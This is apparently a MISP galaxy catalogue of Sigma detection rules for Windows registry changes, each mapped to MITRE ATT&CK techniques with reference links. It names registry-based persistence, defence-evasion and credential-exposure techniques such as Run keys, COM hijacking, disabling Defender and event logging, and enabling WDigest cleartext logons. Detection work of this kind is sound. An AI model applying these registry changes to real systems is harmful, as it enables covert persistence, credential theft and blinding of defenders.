Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. We can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml) In some SIEM you can catch those events also in HKLM\System\ControlSet001\Services or HKLM\System\ControlSet002\Services, however, this rule is based on a regular sysmon’s events.

The tag is: misp-galaxy:sigma-rules="CobaltStrike Service Installations in Registry"

CobaltStrike Service Installations in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9356. Table References

Links

https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml

Running Chrome VPN Extensions via the Registry 2 VPN Extension

Running Chrome VPN Extensions via the Registry install 2 vpn extension

The tag is: misp-galaxy:sigma-rules="Running Chrome VPN Extensions via the Registry 2 VPN Extension"

Running Chrome VPN Extensions via the Registry 2 VPN Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 9357. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml

Potential Persistence Via Visual Studio Tools for Office

Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Visual Studio Tools for Office"

Potential Persistence Via Visual Studio Tools for Office has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006" with estimative-language:likelihood-probability="almost-certain"

Table 9358. Table References

Links

https://twitter.com/_vivami/status/1347925307643355138

https://vanmieghem.io/stealth-outlook-persistence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml

Wow6432Node CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Wow6432Node CurrentVersion Autorun Keys Modification"

Wow6432Node CurrentVersion Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9359. Table References

Links

https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml

Suspicious Keyboard Layout Load

Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only

The tag is: misp-galaxy:sigma-rules="Suspicious Keyboard Layout Load"

Suspicious Keyboard Layout Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 9360. Table References

Links

https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files

https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml

Disable Tamper Protection on Windows Defender

Detects disabling Windows Defender Tamper Protection

The tag is: misp-galaxy:sigma-rules="Disable Tamper Protection on Windows Defender"

Disable Tamper Protection on Windows Defender has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9361. Table References

Links

https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml

Wdigest Enable UseLogonCredential

Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials

The tag is: misp-galaxy:sigma-rules="Wdigest Enable UseLogonCredential"

Wdigest Enable UseLogonCredential has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9362. Table References

Links

https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649

https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials

https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml

Change the Fax Dll

Detect possible persistence using Fax DLL load when service restart

The tag is: misp-galaxy:sigma-rules="Change the Fax Dll"

Change the Fax Dll has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9363. Table References

Links

https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf

https://twitter.com/dottor_morte/status/1544652325570191361

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml

ETW Logging Disabled For SCM

Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)

The tag is: misp-galaxy:sigma-rules="ETW Logging Disabled For SCM"

ETW Logging Disabled For SCM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9364. Table References

Links

http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml

Disable PUA Protection on Windows Defender

Detects disabling Windows Defender PUA protection

The tag is: misp-galaxy:sigma-rules="Disable PUA Protection on Windows Defender"

Disable PUA Protection on Windows Defender has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9365. Table References

Links

https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml

Persistence Via New SIP Provider

Detects when an attacker register a new SIP provider for persistence and defense evasion

The tag is: misp-galaxy:sigma-rules="Persistence Via New SIP Provider"

Persistence Via New SIP Provider has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003" with estimative-language:likelihood-probability="almost-certain"

Table 9366. Table References

Links

https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

https://github.com/gtworek/PSBits/tree/master/SIP

https://persistence-info.github.io/Data/codesigning.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml

Classes Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Classes Autorun Keys Modification"

Classes Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9367. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml

Potentially Suspicious ODBC Driver Registered

Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious ODBC Driver Registered"

Potentially Suspicious ODBC Driver Registered has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 9368. Table References

Links

https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_odbc_driver_registered_susp.yml

Disable Microsoft Defender Firewall via Registry

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage

The tag is: misp-galaxy:sigma-rules="Disable Microsoft Defender Firewall via Registry"

Disable Microsoft Defender Firewall via Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 9369. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml

Potential Registry Persistence Attempt Via DbgManagedDebugger

Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes

The tag is: misp-galaxy:sigma-rules="Potential Registry Persistence Attempt Via DbgManagedDebugger"

Potential Registry Persistence Attempt Via DbgManagedDebugger has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 9370. Table References

Links

https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/

https://github.com/last-byte/PersistenceSniper

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml

Uncommon Microsoft Office Trusted Location Added

Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.

The tag is: misp-galaxy:sigma-rules="Uncommon Microsoft Office Trusted Location Added"

Uncommon Microsoft Office Trusted Location Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9371. Table References

Links

https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_trusted_location_uncommon.yml

Disable Privacy Settings Experience in Registry

Detects registry modifications that disable Privacy Settings Experience

The tag is: misp-galaxy:sigma-rules="Disable Privacy Settings Experience in Registry"

Disable Privacy Settings Experience in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9372. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml

Usage of Renamed Sysinternals Tools - RegistrySet

Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution

The tag is: misp-galaxy:sigma-rules="Usage of Renamed Sysinternals Tools - RegistrySet"

Usage of Renamed Sysinternals Tools - RegistrySet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 9373. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml

COM Hijacking via TreatAs

Detect modification of TreatAs key to enable "rundll32.exe -sta" command

The tag is: misp-galaxy:sigma-rules="COM Hijacking via TreatAs"

COM Hijacking via TreatAs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9374. Table References

Links

https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml

PowerShell Script Execution Policy Enabled

Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.

The tag is: misp-galaxy:sigma-rules="PowerShell Script Execution Policy Enabled"

Table 9375. Table References

Links

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml

New File Association Using Exefile

Detects the abuse of the exefile handler in new file association. Used for bypass of security products.

The tag is: misp-galaxy:sigma-rules="New File Association Using Exefile"

Table 9376. Table References

Links

https://twitter.com/mrd0x/status/1461041276514623491

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml

Disable Windows Event Logging Via Registry

Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel

The tag is: misp-galaxy:sigma-rules="Disable Windows Event Logging Via Registry"

Disable Windows Event Logging Via Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 9377. Table References

Links

https://twitter.com/WhichbufferArda/status/1543900539280293889

https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml

New BgInfo.EXE Custom VBScript Registry Configuration

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"

The tag is: misp-galaxy:sigma-rules="New BgInfo.EXE Custom VBScript Registry Configuration"

New BgInfo.EXE Custom VBScript Registry Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9378. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_vbscript.yml

Registry Persistence via Service in Safe Mode

Detects the modification of the registry to allow a driver or service to persist in Safe Mode.

The tag is: misp-galaxy:sigma-rules="Registry Persistence via Service in Safe Mode"

Registry Persistence via Service in Safe Mode has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 9379. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml

Scheduled TaskCache Change by Uncommon Program

Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious

The tag is: misp-galaxy:sigma-rules="Scheduled TaskCache Change by Uncommon Program"

Scheduled TaskCache Change by Uncommon Program has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9380. Table References

Links

https://labs.f-secure.com/blog/scheduled-task-tampering/

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml

Macro Enabled In A Potentially Suspicious Document

Detects registry changes to Office trust records where the path is located in a potentially suspicious location

The tag is: misp-galaxy:sigma-rules="Macro Enabled In A Potentially Suspicious Document"

Macro Enabled In A Potentially Suspicious Document has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9381. Table References

Links

Internal Research[Internal Research]

https://twitter.com/inversecos/status/1494174785621819397

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_trust_record_susp_location.yml

Suspicious Powershell In Registry Run Keys

Detects potential PowerShell commands or code within registry run keys

The tag is: misp-galaxy:sigma-rules="Suspicious Powershell In Registry Run Keys"

Suspicious Powershell In Registry Run Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9382. Table References

Links

https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html

https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml

Registry Persistence via Explorer Run Key

Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder

The tag is: misp-galaxy:sigma-rules="Registry Persistence via Explorer Run Key"

Registry Persistence via Explorer Run Key has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9383. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml

Potential Persistence Via GlobalFlags

Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via GlobalFlags"

Potential Persistence Via GlobalFlags has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012" with estimative-language:likelihood-probability="almost-certain"

Table 9384. Table References

Links

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/

https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml

Persistence Via Disk Cleanup Handler - Autorun

Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager’s UI. Although Windows comes with a number of disk cleanup handlers, they aren’t designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.

The tag is: misp-galaxy:sigma-rules="Persistence Via Disk Cleanup Handler - Autorun"

Table 9385. Table References

Links

https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/

https://persistence-info.github.io/Data/diskcleanuphandler.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml

Potential Persistence Via Excel Add-in - Registry

Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Excel Add-in - Registry"

Potential Persistence Via Excel Add-in - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006" with estimative-language:likelihood-probability="almost-certain"

Table 9386. Table References

Links

https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence

https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_xll.yml

Potential Persistence Via MyComputer Registry Keys

Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via MyComputer Registry Keys"

Table 9387. Table References

Links

https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml

New RUN Key Pointing to Suspicious Folder

Detects suspicious new RUN key element pointing to an executable in a suspicious folder

The tag is: misp-galaxy:sigma-rules="New RUN Key Pointing to Suspicious Folder"

New RUN Key Pointing to Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9388. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml

Custom File Open Handler Executes PowerShell

Detects the abuse of custom file open handler, executing powershell

The tag is: misp-galaxy:sigma-rules="Custom File Open Handler Executes PowerShell"

Custom File Open Handler Executes PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 9389. Table References

Links

https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml

Service Binary in Suspicious Folder

Detect the creation of a service with a service binary located in a suspicious directory

The tag is: misp-galaxy:sigma-rules="Service Binary in Suspicious Folder"

Service Binary in Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9390. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml

NET NGenAssemblyUsageLog Registry Key Tamper

Detects changes to the NGenAssemblyUsageLog registry key. .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.

The tag is: misp-galaxy:sigma-rules="NET NGenAssemblyUsageLog Registry Key Tamper"

NET NGenAssemblyUsageLog Registry Key Tamper has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9391. Table References

Links

https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml

Common Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Common Autorun Keys Modification"

Common Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9392. Table References

Links

https://persistence-info.github.io/Data/userinitmprlogonscript.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml

ETW Logging Disabled For rpcrt4.dll

Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll

The tag is: misp-galaxy:sigma-rules="ETW Logging Disabled For rpcrt4.dll"

ETW Logging Disabled For rpcrt4.dll has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9393. Table References

Links

http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml

Potential Persistence Via Scrobj.dll COM Hijacking

Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Scrobj.dll COM Hijacking"

Potential Persistence Via Scrobj.dll COM Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9394. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_scrobj_dll.yml

Allow RDP Remote Assistance Feature

Detect enable rdp feature to allow specific user to rdp connect on the targeted machine

The tag is: misp-galaxy:sigma-rules="Allow RDP Remote Assistance Feature"

Allow RDP Remote Assistance Feature has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9395. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml

RDP Sensitive Settings Changed

Detects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'…​etc

The tag is: misp-galaxy:sigma-rules="RDP Sensitive Settings Changed"

RDP Sensitive Settings Changed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9396. Table References

Links

https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03

https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/

https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry

https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html

http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/

https://blog.sekoia.io/darkgate-internals/

https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html

https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry

https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services

http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml

Add Port Monitor Persistence in Registry

Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.

The tag is: misp-galaxy:sigma-rules="Add Port Monitor Persistence in Registry"

Add Port Monitor Persistence in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010" with estimative-language:likelihood-probability="almost-certain"

Table 9397. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml

Office Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Office Autorun Keys Modification"

Office Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9398. Table References

Links

